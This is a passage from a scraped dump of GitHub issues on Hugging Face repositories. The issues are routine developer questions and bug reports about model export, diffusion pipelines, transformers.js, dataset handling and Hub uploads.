Diffusers could support this. \r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/9352", "state": "open", "labels": [ "wip" ], "created_at": "2024-09-03T06:54:38Z", "updated_at": "2024-11-23T04:57:37Z", "comments": 13, "user": "fzyzcjy" }, { "repo": "huggingface/speech-to-speech", "number": 71, "title": "How to run in ubuntu", "body": "I am trying to run it locally in my Ubuntu machine I have nvidia gpu and already setup CUDA.\r\n\r\n```\r\npython s2s_pipeline.py \\\r\n\t--recv_host 0.0.0.0 \\\r\n\t--send_host 0.0.0.0 \\\r\n\t--lm_model_name microsoft/Phi-3-mini-4k-instruct \\\r\n\t--init_chat_role system \\\r\n\t--stt_compile_mode reduce-overhead \\\r\n\t--tts_compile_mode default \r\n```\r\nThis is the command I passed in the terminal but I am getting Error like this\r\n\r\n```\r\n(venv) basal-desktop@basal-desktop:/media/basal-desktop/E/speech-to-speech$ python s2s_pipeline.py --recv_host 0.0.0.0 --send_host 0.0.0.0 --lm_model_name microsoft/Phi-3-mini-4k-instruct --init_chat_role system --stt_compile_mode reduce-overhead --tts_compile_mode default \r\n[nltk_data] Downloading package averaged_perceptron_tagger_eng to\r\n[nltk_data] /home/basal-desktop/nltk_data...\r\n[nltk_data] Package averaged_perceptron_tagger_eng is already up-to-\r\n[nltk_data] date!\r\nUsing cache found in /home/basal-desktop/.cache/torch/hub/snakers4_silero-vad_master\r\n2024-09-03 11:20:08,495 - STT.whisper_stt_handler - INFO - Warming up WhisperSTTHandler\r\nYou have passed task=transcribe, but also have set `forced_decoder_ids` to [[1, None], [2, 50360]] which creates a conflict. `forced_decoder_ids` will be ignored in favor of task=transcribe.\r\nThe attention mask is not set and cannot be inferred from input because pad token is same as eos token.As a consequence, you may observe unexpected behavior. Please pass your input's `attention_mask` to obtain reliable results.\r\n/tmp/tmp1sx5flzq/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp7dgszafh/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpgutcpzdq/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpxya7vifd/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpoxfa0b57/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp9sd15wgk/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpuimau_4j/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp2hzix58m/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmppnjhbdhp/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp2dvfaztp/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpaofqmu2k/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpcnc1scdn/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpnsf4b2jl/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpf_5rg_m_/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpnf8nvq6n/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp2f8iezjt/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp_om2_15p/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpc0t1q8vd/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpdsdc_2ef/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp7h6fpvoc/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp4qfy9i7j/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpsjvhjzmz/main.c:5:10: fatal error: Py", "url": "https://github.com/huggingface/speech-to-speech/issues/71", "state": "closed", "labels": [], "created_at": "2024-09-03T06:02:45Z", "updated_at": "2024-10-01T07:45:20Z", "user": "Basal-Analytics" }, { "repo": "huggingface/optimum", "number": 2006, "title": "Support for gemma2-2b-it(gemma 2nd version) Model Export in Optimum for OpenVINO", "body": "### Feature request\n\n please provide Support for gemma2 Model Export in Optimum for OpenVINO\r\nversion:optimum(1.21.4)\r\ntransformers:4.43.4\n\n### Motivation\n\nI encountered an issue while trying to export a gemma2 model using the optimum library for ONNX export. The error message suggests that the gemma2 model is either a custom or unsupported architecture, and I need to provide a custom export configuration.\r\n\r\nerror:raise ValueError(\r\nValueError: Trying to export a gemma2 model, that is a custom or unsupported architecture, but no custom export configuration was passed as `custom_export_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum-intel/issues if you would like the model type gemma2 to be supported natively in the OpenVINO export\n\n### Your contribution\n\nIt would be great if support for the gemma2 model could be added natively in the optimum library for OpenVINO export. Alternatively, detailed guidance on how to create a custom export configuration for this model would be appreciated.i", "url": "https://github.com/huggingface/optimum/issues/2006", "state": "open", "labels": [ "onnx" ], "created_at": "2024-09-03T05:54:51Z", "updated_at": "2025-01-22T15:40:04Z", "comments": 2, "user": "chakka12345677" }, { "repo": "huggingface/transformers", "number": 33270, "title": "Static KV cache status: How to use it? Does it work for all models?", "body": "I see that there are many PRs about [StaticCache](https://github.com/huggingface/transformers/pulls?q=is%3Apr+StaticCache), but I couldn't find a clear documentation on how to use it.\r\n\r\n#### What I want\r\n\r\n* To not have Transformers allocate memory dynamically for the KV cache when using `model.generate()`, as that leads to increased memory usage (due to garbage collection not happening fast/often enough) and worse performance.\r\n\r\n* To use that by default always, for every model, for every supported quantization backend (AutoAWQ, AutoGPTQ, AQLM, bitsandbytes, etc).\r\n\r\n#### Who can help?\r\n\r\nMaybe @gante ", "url": "https://github.com/huggingface/transformers/issues/33270", "state": "closed", "labels": [], "created_at": "2024-09-03T02:17:54Z", "updated_at": "2024-11-25T16:17:25Z", "user": "oobabooga" }, { "repo": "huggingface/transformers.js", "number": 917, "title": "Where should I get `decoder_model_merged` file from?", "body": "### Question\n\nHey,\r\nI'm trying to use `whisper-web` demo with my finetuned model.\r\nAfter I managed connecting my model to the demo application, I'm getting errors related to this:\r\n\r\nhttps://github.com/xenova/transformers.js/blob/7f5081da29c3f77ee830269ab801344776e61bcb/src/models.js#L771\r\n\r\nBasically, when `transformers.js` tries to load a whisper model, it looks for files called `decoder_model_merged.onnx` / `decoder_model_merged_quantized.onnx` / `decoder_model_merged_fp16.onnx`.\r\nThe thing is, that the conversion script didn't create any of these files.\r\nThat's how the conversion script output looks like:\r\n![image](https://github.com/user-attachments/assets/f6288c77-5010-4d98-a609-f38e46e1afaa)\r\n\r\n\r\nPlease help me figure out what am I missing here.\r\nP.S. After I'll get it to work, I'll be happy to open a PR on `whisper-web` repository that will enable using local models together with remote (on HF hub) models.\r\nThanks !", "url": "https://github.com/huggingface/transformers.js/issues/917", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-02T07:30:57Z", "updated_at": "2025-02-26T12:05:05Z", "user": "abuchnick-aiola" }, { "repo": "huggingface/diffusers", "number": 9339, "title": "SD3 inpatinting", "body": "I found the StableDiffusion3InpaintPipeline, where can i found the weight of SD3 inpainting", "url": "https://github.com/huggingface/diffusers/issues/9339", "state": "closed", "labels": [ "stale" ], "created_at": "2024-09-02T05:00:19Z", "updated_at": "2024-10-02T15:43:24Z", "comments": 5, "user": "ucasyjz" }, { "repo": "huggingface/transformers", "number": 33232, "title": "How to use hugginface for training: google-t5/t5-base", "body": "### Feature request\r\n\r\nHow to use hugginface for training / \u5982\u4f55\u4f7f\u7528huggingface\u6765\u8bad\u7ec3\uff1a\r\n https://github.com/huggingface/transformers/tree/main/examples/pytorch/translation\r\n\r\n#What is the format and how do I write it? / \u8fd9\u4e2a\u683c\u5f0f\u662f\u600e\u4e48\u6837\u7684\uff0c\u600e\u4e48\u5199\u5462\uff1f\r\ndef batch_collator(data):\r\n print(data) #????????????????????????????????????????????? \r\n return {\r\n 'pixel_values': torch.stack([x for x in pixel_values]), \r\n 'labels': torch.tensor([x for x in labels]) \r\n }\r\n\r\ntrainer = Trainer(\r\n model=model,\r\n args=training_args,\r\n data_collator=batch_collator,//\u8fd9\u4e2a\u9700\u8981\u600e\u4e48\u5199?\r\n train_dataset=dataset['train'], \r\n)\r\n\r\n### Motivation\r\n\r\n\u65e0\r\n\r\n### Your contribution\r\n\r\n\u65e0\r\n\r\n\r\n\u6211\u5df2\u7ecf\u8bd5\u4e86\u53ef\u4ee5\u7528\uff1a https://www.kaggle.com/code/weililong/google-t5-t5-base \r\n\u4e0d\u77e5\u9053\u6709\u6ca1\u6709\u4ec0\u4e48\u5751", "url": "https://github.com/huggingface/transformers/issues/33232", "state": "open", "labels": [ "Usage", "Feature request" ], "created_at": "2024-08-31T07:41:18Z", "updated_at": "2024-09-09T08:45:50Z", "user": "gg22mm" }, { "repo": "huggingface/transformers", "number": 33228, "title": "How to obtain batch index of validation dataset?", "body": "Hi,\r\n\r\nI wanted to know how would we fetch the batch id/index of the eval dataset in ```preprocess_logits_for_metrics()``` ?\r\n\r\nThanks in advance!", "url": "https://github.com/huggingface/transformers/issues/33228", "state": "closed", "labels": [ "Usage" ], "created_at": "2024-08-31T00:11:13Z", "updated_at": "2024-10-13T08:04:26Z", "user": "SoumiDas" }, { "repo": "huggingface/transformers", "number": 33210, "title": "The model's address is https://huggingface.co/Xenova/nllb-200-distilled-600M/tree/main/onnx\u3002I don't know how to load encode.onnx and decoder.onnx, and successfully translate a sentence into another language. Can you help me write an inference code to achieve the translation effect through the encoder and decoder? thank you", "body": "### Feature request\n\nhello\uff0cThe model's address is [https://huggingface.co/Xenova/nllb-200-distilled-600M/tree/main/onnx\u3002I](https://huggingface.co/Xenova/nllb-200-distilled-600M/tree/main/onnx%E3%80%82I) don't know how to load encode.onnx and decoder.onnx, and successfully translate a sentence into another language. Can you help me write an inference code to achieve the translation effect through the encoder and decoder? thank you\n\n### Motivation\n\nhello\uff0cThe model's address is [https://huggingface.co/Xenova/nllb-200-distilled-600M/tree/main/onnx\u3002I](https://huggingface.co/Xenova/nllb-200-distilled-600M/tree/main/onnx%E3%80%82I) don't know how to load encode.onnx and decoder.onnx, and successfully translate a sentence into another language. Can you help me write an inference code to achieve the translation effect through the encoder and decoder? thank you\n\n### Your contribution\n\nhello\uff0cThe model's address is [https://huggingface.co/Xenova/nllb-200-distilled-600M/tree/main/onnx\u3002I](https://huggingface.co/Xenova/nllb-200-distilled-600M/tree/main/onnx%E3%80%82I) don't know how to load encode.onnx and decoder.onnx, and successfully translate a sentence into another language. Can you help me write an inference code to achieve the translation effect through the encoder and decoder? thank you", "url": "https://github.com/huggingface/transformers/issues/33210", "state": "open", "labels": [ "Feature request" ], "created_at": "2024-08-30T09:33:01Z", "updated_at": "2024-10-22T07:18:15Z", "user": "pengpengtao" }, { "repo": "huggingface/dataset-viewer", "number": 3054, "title": "Image URL detection", "body": "[`is_image_url`](https://github.com/huggingface/dataset-viewer/blob/946b0788fa426007161f2077a70b5ae64b211cf8/libs/libcommon/src/libcommon/utils.py#L131-L134) relies on a filename and extension being present, however, in some cases an image URL does not contain a filename. Example [dataset](https://huggingface.co/datasets/bigdata-pw/SteamScreenshots) and example [URL](https://steamuserimages-a.akamaihd.net/ugc/910172100453203507/062F4787060B2E4E93EFC4631E96183B027A860B/). This could be improved by checking the `content-type` header of the response or checking for strings like \"image\" in the URL.", "url": "https://github.com/huggingface/dataset-viewer/issues/3054", "state": "open", "labels": [ "question", "improvement / optimization", "P2" ], "created_at": "2024-08-29T23:17:55Z", "updated_at": "2025-07-04T09:37:23Z", "user": "hlky" }, { "repo": "huggingface/transformers.js", "number": 911, "title": "Next.js example breaks with v3", "body": "### Question\n\nAre there steps documented anywhere for running V3 in your app? I'm trying to test it out via these steps:\r\n\r\n1. Pointing to the alpha in my `package.json`: `\"@huggingface/transformers\": \"^3.0.0-alpha.10\",`\r\n2. `npm i`\r\n3. `cd node_modules/@hugginface/transformers && npm i`\r\n4. copy the [webpack.config.js](https://github.com/xenova/transformers.js/blob/main/webpack.config.js) from the repo into the node_modules/@hugginface/transformers dir.\r\n5. `npm run build` in node_modules/@hugginface/transformers dir.\r\n\r\nI then run my app, and get the following error:\r\n```\r\nERROR in ../../node_modules/@huggingface/transformers/dist/transformers.js 42256:34-64\r\nModule not found: Error: Can't resolve './' in '/node_modules/@huggingface/transformers/dist'\r\nwebpack compiled with 1 error\r\n```\r\n\r\nThanks, I'm excited to test out the latest and greatest!", "url": "https://github.com/huggingface/transformers.js/issues/911", "state": "closed", "labels": [ "question" ], "created_at": "2024-08-29T20:17:03Z", "updated_at": "2025-02-16T12:35:47Z", "user": "stinoga" }, { "repo": "huggingface/diffusers", "number": 9317, "title": "Finetuning on dataset", "body": "dear @thedarkzeno and @patil-suraj \r\n\r\nThank you so much for putting your work out there. I wanted to ask, how would the training be for training on a dataset and not a single instance image as mentioned in train_dreambooth_inpaint. And can I finetune models trained from https://github.com/CompVis/latent-diffusion repository?\r\n\r\nThanks in advance", "url": "https://github.com/huggingface/diffusers/issues/9317", "state": "closed", "labels": [ "stale" ], "created_at": "2024-08-29T12:20:51Z", "updated_at": "2024-10-23T16:10:47Z", "comments": 4, "user": "ultiwinter" }, { "repo": "huggingface/optimum-quanto", "number": 300, "title": "How to quantize, save and load Stable Diffusion 3 model.", "body": "import torch\r\n\r\nfrom optimum.quanto import qint2, qint4, qint8, quantize, freeze\r\n\r\nfrom diffusers import StableDiffusion3Pipeline\r\n\r\n\r\npipe = StableDiffusion3Pipeline.from_pretrained(\"stabilityai/stable-diffusion-3-medium-diffusers\", torch_dtype=torch.bfloat16)\r\n\r\nquantize(pipe.text_encoder, weights=qint4)\r\nfreeze(pipe.text_encoder)\r\n\r\nquantize(pipe.text_encoder_3, weights=qint4)\r\nfreeze(pipe.text_encoder_3)\r\n\r\nquantize(pipe.transformer, weights=qint8, exclude=\"proj_out\")\r\nfreeze(pipe.transformer)\r\n\r\npipe = pipe.to(\"cuda\")\r\npipe.save_pretrained(\"/content/drive/MyDrive/quantized_Stable_diffusion_1\")\r\n\r\nafter saving how can i load this model from this directory and perform text to image generation", "url": "https://github.com/huggingface/optimum-quanto/issues/300", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-08-29T06:24:02Z", "updated_at": "2024-10-06T02:06:30Z", "user": "jainrahul52" }, { "repo": "huggingface/optimum", "number": 2002, "title": "Is it possible to infer the model separately through encoder.onnx and decoder.onnx", "body": "### Feature request\n\nIs it possible to infer the model separately through encoder.onnx and decoder.onnx\n\n### Motivation\n\nIs it possible to infer the model separately through encoder.onnx and decoder.onnx\n\n### Your contribution\n\nIs it possible to infer the model separately through encoder.onnx and decoder.onnx", "url": "https://github.com/huggingface/optimum/issues/2002", "state": "open", "labels": [ "onnx" ], "created_at": "2024-08-29T03:26:20Z", "updated_at": "2024-10-08T15:28:59Z", "comments": 0, "user": "pengpengtao" }, { "repo": "huggingface/diffusers", "number": 9303, "title": "[Add] VEnhancer - the interpolation and upscaler for CogVideoX-5b", "body": "### Model/Pipeline/Scheduler description\n\nVEnhancer, a generative space-time enhancement framework that can improve the existing T2V results.\r\n\r\nhttps://github.com/Vchitect/VEnhancer\n\n### Open source status\n\n- [X] The model implementation is available.\n- [X] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9303", "state": "open", "labels": [ "stale" ], "created_at": "2024-08-28T14:43:32Z", "updated_at": "2024-12-11T15:04:32Z", "comments": 3, "user": "tin2tin" }, { "repo": "huggingface/text-generation-inference", "number": 2466, "title": "Guide on how to use TensorRT-LLM Backend", "body": "### Feature request\n\nDoes any documentation exist, or would it be possible to add documentation, on how to use the TensorRT-LLM backend? #2458 makes mention that the TRT-LLM backend exists, and I can see that there's a Dockerfile for TRT-LLM, but I don't see any guides on how to build/use it.\n\n### Motivation\n\nI would like to run TensorRT-LLM models using TGI.\n\n### Your contribution\n\nI'm willing to test any builds/processes/pipelines that are available.", "url": "https://github.com/huggingface/text-generation-inference/issues/2466", "state": "open", "labels": [], "created_at": "2024-08-28T13:24:26Z", "updated_at": "2025-05-18T16:23:14Z", "user": "michaelthreet" }, { "repo": "huggingface/lerobot", "number": 390, "title": "[Feature Request] Add end effector pos field in lerobot dataset?", "body": "Aloha style joint space dataset will limit data set to the specific robot. Can we change joint space data or add a field of end effector to cartesian space data base on the robot URDF file?\r\n\r\nIt may help robotics community build a more generalized policy.", "url": "https://github.com/huggingface/lerobot/issues/390", "state": "closed", "labels": [ "question", "dataset", "robots" ], "created_at": "2024-08-28T13:19:15Z", "updated_at": "2024-08-29T09:55:27Z", "user": "hilookas" }, { "repo": "huggingface/datasets", "number": 7129, "title": "Inconsistent output in documentation example: `num_classes` not displayed in `ClassLabel` output", "body": "In the documentation for [ClassLabel](https://huggingface.co/docs/datasets/v2.21.0/en/package_reference/main_classes#datasets.ClassLabel), there is an example of usage with the following code:\r\n\r\n````\r\nfrom datasets import Features\r\nfeatures = Features({'label': ClassLabel(num_classes=3, names=['bad', 'ok', 'good'])})\r\nfeatures\r\n````\r\n\r\nwhich expects to output (as stated in the documentation):\r\n\r\n````\r\n{'label': ClassLabel(num_classes=3, names=['bad', 'ok', 'good'], id=None)}\r\n````\r\n\r\nbut it generates the following\r\n\r\n````\r\n{'label': ClassLabel(names=['bad', 'ok', 'good'], id=None)}\r\n````\r\n\r\nIf my understanding is correct, this happens because although num_classes is used during the init of the object, it is afterward ignored:\r\n\r\nhttps://github.com/huggingface/datasets/blob/be5cff059a2a5b89d7a97bc04739c4919ab8089f/src/datasets/features/features.py#L975\r\n\r\nI would like to work on this issue if this is something needed \ud83d\ude04\r\n", "url": "https://github.com/huggingface/datasets/issues/7129", "state": "closed", "labels": [], "created_at": "2024-08-28T12:27:48Z", "updated_at": "2024-12-06T11:32:02Z", "comments": 0, "user": "sergiopaniego" }, { "repo": "huggingface/diffusers", "number": 9299, "title": "CUDAGRAPHs for Flux position embeddings", "body": "@yiyixuxu \r\n\r\nIs it possible to refactor the Flux positional embeddings so that we can fully make use of CUDAGRAPHs? \r\n\r\n```bash\r\nskipping cudagraphs due to skipping cudagraphs due to cpu device (device_put). Found from : \r\n File \"/home/sayak/diffusers/src/diffusers/models/transformers/transformer_flux.py\", line 469, in forward\r\n image_rotary_emb = self.pos_embed(ids)\r\n File \"/home/sayak/.pyenv/versions/diffusers/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1562, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/home/sayak/diffusers/src/diffusers/models/embeddings.py\", line 630, in forward\r\n self.axes_dim[i], pos[:, i], repeat_interleave_real=True, use_real=True, freqs_dtype=freqs_dtype\r\n```\r\n\r\n
\r\nCode\r\n\r\n```python\r\nimport torch\r\n\r\ntorch.set_float32_matmul_precision(\"high\")\r\ntorch._inductor.conv_1x1_as_mm = True\r\ntorch._inductor.coordinate_descent_tuning = True\r\ntorch._inductor.epilogue_fusion = False\r\ntorch._inductor.coordinate_descent_check_all_directions = True\r\n\r\nimport diffusers\r\nfrom platform import python_version\r\nfrom diffusers import DiffusionPipeline\r\n\r\nprint(diffusers.__version__)\r\nprint(torch.__version__)\r\nprint(python_version())\r\n\r\n\r\npipe = DiffusionPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16).to(\"cuda\")\r\npipe.transformer.to(memory_format=torch.channels_last)\r\npipe.vae.to(memory_format=torch.channels_last)\r\n\r\npipe.transformer = torch.compile(pipe.transformer, mode=\"max-autotune\", fullgraph=True)\r\npipe.vae.decode = torch.compile(pipe.vae.decode, mode=\"max-autotune\", fullgraph=True)\r\n\r\nfor _ in range(5):\r\n image = pipe(\r\n \"Happy bear\",\r\n num_inference_steps=5,\r\n guidance_scale=3.5,\r\n max_sequence_length=512,\r\n generator=torch.manual_seed(42),\r\n height=1024,\r\n width=1024,\r\n ).images[0]\r\n```\r\n\r\n
\r\n\r\n\r\nIf we can fully make sure CUDAGRAPHs `torch.compile()` would be faster. ", "url": "https://github.com/huggingface/diffusers/issues/9299", "state": "closed", "labels": [], "created_at": "2024-08-28T11:33:16Z", "updated_at": "2024-08-29T19:37:17Z", "comments": 0, "user": "sayakpaul" }, { "repo": "huggingface/transformers.js", "number": 906, "title": "Unsupported model type: jais", "body": "### Question\n\n### System Info\r\nmacOS, node v20.10, @xenova/transformers 2.17.2\r\n\r\n### Environment/Platform\r\n- [ ] Website/web-app\r\n- [ ] Browser extension\r\n- [x] Server-side (e.g., Node.js, Deno, Bun)\r\n- [ ] Desktop app (e.g., Electron)\r\n- [ ] Other (e.g., VSCode extension)\r\n\r\n### Description\r\n```\r\nError: Unsupported model type: jais\r\n at Function.from_pretrained (file:///node_modules/@xenova/transformers/src/models.js:5526:19)\r\n at async Promise.all (index 1)\r\n at loadItems (file:///node_modules/@xenova/transformers/src/pipelines.js:3279:5)\r\n at pipeline (file:///node_modules/@xenova/transformers/src/pipelines.js:3219:21)\r\n at SearchQueryParser.initializeModel (src/search-engine/query-parser/search-query-parser.ts:27:18)\r\n``` \r\n\r\n### Reproduction\r\n```javascript\r\nimport { Logger } from '@nestjs/common';\r\n\r\nexport class SearchQueryParser {\r\n private tokenizer: any;\r\n private model: any;\r\n private logger: Logger;\r\n private systemPrompt = '';\r\n\r\n constructor() {\r\n this.logger = new Logger('query parser');\r\n this.initializeModel();\r\n }\r\n\r\n private async initializeModel() {\r\n const { AutoTokenizer, pipeline } = await import('@xenova/transformers');\r\n this.tokenizer = await AutoTokenizer.from_pretrained(\r\n 'omarabb315/Query-5KM-no_synonyms_noon_1',\r\n {\r\n progress_callback: (data) => {\r\n this.logger.verbose(\r\n ${data.status} ${data.file || ''} ${data.progress || ''}`,\r\n );\r\n },\r\n },\r\n );\r\n this.model = await pipeline(\r\n 'text-generation',\r\n 'omarabb315/Query-5KM-no_synonyms_noon_1',\r\n );\r\n }\r\n\r\n async parse(query: string): Promise {\r\n if (!this.model) {\r\n await this.initializeModel();\r\n }\r\n\r\n const tokenizerResponse = this.tokenizer.apply_chat_template(\r\n [\r\n { role: 'system', content: this.systemPrompt },\r\n { role: 'user', content: query },\r\n ],\r\n {\r\n tokenize: false,\r\n add_generation_prompt: true,\r\n },\r\n );\r\n\r\n const response = this.model(tokenizerResponse.toString());\r\n\r\n const parsedQuery = response[0].generated_text;\r\n\r\n return parsedQuery;\r\n }\r\n}\r\n```\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/906", "state": "closed", "labels": [ "question" ], "created_at": "2024-08-28T09:46:17Z", "updated_at": "2024-08-28T21:01:10Z", "user": "SherifElfadaly" }, { "repo": "huggingface/trl", "number": 1986, "title": "how to convert dpodata to ktodata", "body": "### Feature request\n\nhow to convert dpodata to ktodata\n\n### Motivation\n\nhow to convert dpodata to ktodata\n\n### Your contribution\n\nhow to convert dpodata to ktodata", "url": "https://github.com/huggingface/trl/issues/1986", "state": "closed", "labels": [], "created_at": "2024-08-28T06:23:13Z", "updated_at": "2024-08-28T09:02:35Z", "user": "dotsonliu" }, { "repo": "huggingface/datasets", "number": 7128, "title": "Filter Large Dataset Entry by Entry", "body": "### Feature request\n\nI am not sure if this is a new feature, but I wanted to post this problem here, and hear if others have ways of optimizing and speeding up this process.\r\n\r\nLet's say I have a really large dataset that I cannot load into memory. At this point, I am only aware of `streaming=True` to load the dataset. Now, the dataset consists of many tables. Ideally, I would want to have some simple filtering criterion, such that I only see the \"good\" tables. Here is an example of what the code might look like:\r\n\r\n```\r\ndataset = load_dataset(\r\n \"really-large-dataset\",\r\n streaming=True\r\n)\r\n# And let's say we process the dataset bit by bit because we want intermediate results\r\ndataset = islice(dataset, 10000)\r\n\r\n# Define a function to filter the data\r\ndef filter_function(table):\r\n if some_condition:\r\n return True\r\n else:\r\n return False\r\n\r\n# Use the filter function on your dataset\r\nfiltered_dataset = (ex for ex in dataset if filter_function(ex))\r\n```\r\n\r\nAnd then I work on the processed dataset, which would be magnitudes faster than working on the original. I would love to hear if the problem setup + solution makes sense to people, and if anyone has suggestions!\n\n### Motivation\n\nSee description above\n\n### Your contribution\n\nHappy to make PR if this is a new feature", "url": "https://github.com/huggingface/datasets/issues/7128", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-08-27T20:31:09Z", "updated_at": "2024-10-07T23:37:44Z", "comments": 4, "user": "QiyaoWei" }, { "repo": "huggingface/huggingface_hub", "number": 2491, "title": "How to uplaod folders into repo with most effective way - on error continue resume max speed", "body": "Hello. I have the below tasks for uploading however I am not sure if they are most effective way of doing\r\n\r\n#### This cell is used to upload single file into a repo with certain name\r\n\r\n```\r\n\r\nfrom huggingface_hub import HfApi\r\napi = HfApi()\r\napi.upload_file(\r\n path_or_fileobj=r\"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion/model_name.safetensors\",\r\n path_in_repo=\"model_name.safetensors\",\r\n repo_id=\"YourUserName/reponame\",\r\n repo_type=\"model\",\r\n)\r\n```\r\n\r\n\r\n#### This cell is used to upload a folder into a repo with single commit\r\n\r\n```\r\nfrom huggingface_hub import HfApi\r\napi = HfApi()\r\napi.upload_folder(\r\n folder_path=r\"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion\",\r\n repo_id=\"YourUserName/reponame\",\r\n repo_type=\"model\",\r\n)\r\n```\r\n\r\nThis one is especially super slow whenever I run. I think it re-calculates sha to compare if files modified\r\n\r\n#### This cell uploads a folder into remote repo with multi commit\r\n#### Supports continue feature so if gets interrupted you can run again to continue / resume\r\n```\r\n\r\nfrom huggingface_hub import HfApi\r\nfrom huggingface_hub import get_collection, delete_collection_item\r\nfrom huggingface_hub import upload_file\r\nfrom huggingface_hub import (\r\n HfFolder,\r\n ModelCard,\r\n ModelCardData,\r\n create_repo,\r\n hf_hub_download,\r\n upload_folder,\r\n whoami,\r\n)\r\napi = HfApi()\r\nupload_folder(\r\n folder_path=r\"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion\",\r\n repo_id=\"YourUserName/reponame\",\r\n repo_type=\"model\",\r\n multi_commits=True,\r\n multi_commits_verbose=True,\r\n)\r\n\r\n\r\n\r\n```\r\n\r\n", "url": "https://github.com/huggingface/huggingface_hub/issues/2491", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-27T16:36:04Z", "updated_at": "2024-08-28T08:24:22Z", "user": "FurkanGozukara" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 73, "title": "Download model files from GCS (Instead of HF Hub)", "body": "When deploying an HF model to Vertex AI, I would like to download a fine-tuned model from GCS, instead of from HF Hub, like so:\r\n\r\n```\r\nmodel = aiplatform.Model.upload(\r\n display_name=\"my-model\",\r\n serving_container_image_uri=os.getenv(\"CONTAINER_URI\"),\r\n serving_container_environment_variables={\r\n \"AIP_STORAGE_URI\": \"gs://path/to/model/files\",\r\n },\r\n serving_container_ports=[8080],\r\n)\r\nmodel.wait()\r\n```\r\n\r\nI would expect this to be supported since the entrypoint script logic should handle this: https://github.com/huggingface/Google-Cloud-Containers/blob/main/containers/tei/cpu/1.4.0/entrypoint.sh \r\n\r\nWill this be supported when V1.4 is released? When will this be?", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/73", "state": "closed", "labels": [ "tei", "question" ], "created_at": "2024-08-27T12:14:10Z", "updated_at": "2024-09-16T07:07:11Z", "user": "rm-jeremyduplessis" }, { "repo": "huggingface/chat-ui", "number": 1436, "title": "MODELS=`[ variable problem when I docker run", "body": "Hello,\r\n\r\nI want to use Ollama to use Mistral model and I followed the documentation below : https://huggingface.co/docs/chat-ui/configuration/models/providers/ollama \r\n\r\n`deploy.sh` :\r\n\r\n```sh\r\n#!/bin/bash\r\n\r\nsudo docker compose down\r\nsudo docker rm -f mongodb && sudo docker rm -f chat-ui\r\n\r\n# nginx and ollama\r\nsudo docker compose up -d\r\n\r\n# mongodb\r\nsudo docker run -d -p 27017:27017 -v mongodb-data:/data/db --name mongodb --network backend mongo:latest\r\n\r\n# chat-ui\r\nsudo docker run -d -p 3000:3000 --env-file .env.local -v chat-ui:/data --name chat-ui --network 